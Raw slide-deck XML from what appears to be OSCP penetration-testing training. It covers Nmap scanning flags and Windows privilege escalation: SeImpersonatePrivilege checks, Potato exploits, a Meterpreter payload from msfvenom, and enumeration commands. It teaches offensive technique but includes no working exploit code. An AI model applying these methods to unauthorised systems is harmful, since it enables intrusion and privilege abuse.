                        <a14:foregroundMark x1="24453" y1="12833" x2="30312" y2="16833"/>
                        <a14:foregroundMark x1="30312" y1="16833" x2="33438" y2="28000"/>
                        <a14:foregroundMark x1="33438" y1="28000" x2="26406" y2="30500"/>
                        <a14:foregroundMark x1="26406" y1="30500" x2="14688" y2="29167"/>
                        <a14:foregroundMark x1="23516" y1="18833" x2="24063" y2="18333"/>
                        <a14:foregroundMark x1="71016" y1="11333" x2="56875" y2="17833"/>
                        <a14:foregroundMark x1="56875" y1="17833" x2="50859" y2="11333"/>
                        <a14:foregroundMark x1="50859" y1="11333" x2="40391" y2="9667"/>
                        <a14:foregroundMark x1="40391" y1="9667" x2="33516" y2="15500"/>
                        <a14:foregroundMark x1="33516" y1="15500" x2="27891" y2="7333"/>
                        <a14:foregroundMark x1="27891" y1="7333" x2="20469" y2="3333"/>
                        <a14:foregroundMark x1="20469" y1="3333" x2="11016" y2="24333"/>
                        <a14:foregroundMark x1="11016" y1="24333" x2="4375" y2="29833"/>
                        <a14:foregroundMark x1="4375" y1="29833" x2="7969" y2="45667"/>
                        <a14:foregroundMark x1="7969" y1="45667" x2="14141" y2="53167"/>
                        <a14:foregroundMark x1="14141" y1="53167" x2="12422" y2="44167"/>
                        <a14:foregroundMark x1="83281" y1="32333" x2="89375" y2="44167"/>
                        <a14:foregroundMark x1="89375" y1="44167" x2="95547" y2="50833"/>
                        <a14:foregroundMark x1="95547" y1="50833" x2="89219" y2="79833"/>
                        <a14:foregroundMark x1="89219" y1="79833" x2="90938" y2="93667"/>
                        <a14:foregroundMark x1="96787" y1="91524" x2="98672" y2="90833"/>
                        <a14:foregroundMark x1="90938" y1="93667" x2="94262" y2="92449"/>
                        <a14:foregroundMark x1="98283" y1="81476" x2="98125" y2="77667"/>
                        <a14:foregroundMark x1="98672" y1="90833" x2="98332" y2="82645"/>
                        <a14:foregroundMark x1="94162" y1="82818" x2="93125" y2="84167"/>
                        <a14:foregroundMark x1="98125" y1="77667" x2="97245" y2="78811"/>
                        <a14:foregroundMark x1="5234" y1="36667" x2="5234" y2="29667"/>
                        <a14:foregroundMark x1="28594" y1="26333" x2="27109" y2="21167"/>
                        <a14:foregroundMark x1="19766" y1="26000" x2="20000" y2="19500"/>
                        <a14:foregroundMark x1="1406" y1="29167" x2="1406" y2="29167"/>
                        <a14:foregroundMark x1="68516" y1="9167" x2="68516" y2="9167"/>
                        <a14:backgroundMark x1="95938" y1="77500" x2="95781" y2="77500"/>
                        <a14:backgroundMark x1="96094" y1="81000" x2="95156" y2="81500"/>
                        <a14:backgroundMark x1="97578" y1="79667" x2="94531" y2="82167"/>
                        <a14:backgroundMark x1="94219" y1="82667" x2="94453" y2="82833"/>
                        <a14:backgroundMark x1="97422" y1="79167" x2="96875" y2="78833"/>
                        <a14:backgroundMark x1="96328" y1="90167" x2="93828" y2="91167"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7142480" y="2606807"/>
            <a:ext cx="4949409" cy="2320036"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225775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Port Scanning - Nmap (6/6)</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3582" y="1139672"/>
            <a:ext cx="7169219" cy="5473838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other Useful Flags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Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Disables ping probes (Sometimes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>necessary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-T &lt;0-5&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: changes timing, with 5 being the fastest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strategies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start small – don’t flood the environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doing too much may trigger defenses or cause inaccurate responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AutoRecon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, run smaller scans, too</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lets you enumerate easy things like web-servers while the full scan finishes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDCE04D7-E8A6-4F1C-A8A4-55CC775383C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="21684"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7309898" y="1773096"/>
            <a:ext cx="4667326" cy="3802992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15034474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C71AE-FA18-41F7-86A0-1D7304E53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B3651CD-08F8-4EF4-9502-F4729B6C7386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CF8F851-695B-41A4-87F6-2932CBE765D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414337" y="1295400"/>
            <a:ext cx="7468743" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically, broader than Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Installed software, service control, impersonation privileges, lateral movement (AD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>General Workflow:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Diagram 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1489CA6B-54D7-4B0B-845A-0960C29D0B68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="434050" y="3310467"/>
          <a:ext cx="11344368"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50404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14BB8A-0096-47DA-8677-EE75CC548A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D347FCA-44F4-4E78-83A1-A2DBA865CA41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who Am I?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1931D03F-009E-43B7-860E-CA4EAB2DF224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1905000"/>
            <a:ext cx="6172892" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for easy wins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do I have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SeImpersonatePrivilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do I have permissions to special groups that can help me?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (/all, /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, /groups)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C2A607F-EAF8-4576-AC63-957A58F69754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6796086" y="2343929"/>
            <a:ext cx="4981575" cy="2924175"/>
            <a:chOff x="6796086" y="1854518"/>
            <a:chExt cx="4981575" cy="2924175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{317C4751-F7C4-4A12-9DBE-48DEBAD3F1E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6796086" y="1854518"/>
              <a:ext cx="4981575" cy="2924175"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97571E6C-B05E-4154-8EDA-7A62F4D55EA2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6796086" y="3932808"/>
              <a:ext cx="4620597"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7957071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13621-8CA7-4C78-B357-EB7D765AE7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3DDF236-D2FE-4420-8BBD-815340CB8D3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who Am I? (Continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEE021B5-D1FB-455D-A4F4-496AD4C4EF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1465555"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivEsc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Path: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SeImpersonatePrivilege</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitable by various forms of “Potato” (Bad, Rotten, Juicy, Rogue)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can also use Print Spoofing – outside scope of OSCP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5649F4A7-73F8-43E0-8E75-23E79220AE2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576172" y="5190225"/>
            <a:ext cx="9039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Windows 10 Box = Rogue Potato; met.exe is a Meterpreter executable from </a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>msfvenom</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6AFEDBAD-2B28-4417-A403-4F54D21111B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="842962" y="3106446"/>
            <a:ext cx="10506075" cy="1981200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36912671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31FA8-5280-4A40-B8B8-34608778C0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C889E7-3B63-4AFC-951C-C0FAD8A6CFB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where Am I?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{207496B7-0811-4718-8B6A-0F70C56DF433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11594782" cy="1285240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Looking for outdated OS or missing patches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For AD section – look laterally, too</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D7C28E4-D3AE-43E1-B017-40D2CA7A1737}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="68660"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="438559" y="3778235"/>
            <a:ext cx="10717121" cy="2089905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9674AC85-6316-4DA3-952D-2494BF2EE5D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6765117" y="5128180"/>
            <a:ext cx="4067175" cy="1190625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586405F8-7F9B-4E7C-B414-148AE377C4C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="414335" y="2289824"/>
            <a:ext cx="9291640" cy="1355243"/>
            <a:chOff x="414335" y="2422992"/>
            <a:chExt cx="9291640" cy="1355243"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148ABB05-CB4B-48F4-8BA3-2F359D77188A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="414335" y="2422992"/>
              <a:ext cx="9291640" cy="1355243"/>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Common Commands:</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systeminfo</a:t>
              </a:r>
              <a:endPar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PowerView.ps1: Get-</a:t>
              </a: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DomainComputers</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and more</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="TextBox 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29CD455A-0B08-4637-BA51-7944A212B80E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3022773" y="2883631"/>
              <a:ext cx="3073227" cy="433965"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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ipconfig /all</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76639D77-0720-4DE2-98C1-1CBDB89416AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6096000" y="2893605"/>
              <a:ext cx="3073227" cy="433965"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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netstat -</a:t>
              </a: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ano</a:t>
              </a:r>
              <a:endPar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p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17428569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60A51-F9E2-4F46-BBA4-930849461A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4CF8FB6-DDAF-4517-BC19-AC832D683E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where Am I? (Continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{132FC17C-211E-450A-B919-C3A417CE6C77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="1" b="52541"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="180149" y="2760955"/>
            <a:ext cx="11831701" cy="2486562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1575280-5BD5-49A7-A104-3FEC2EF1C501}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1465555"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
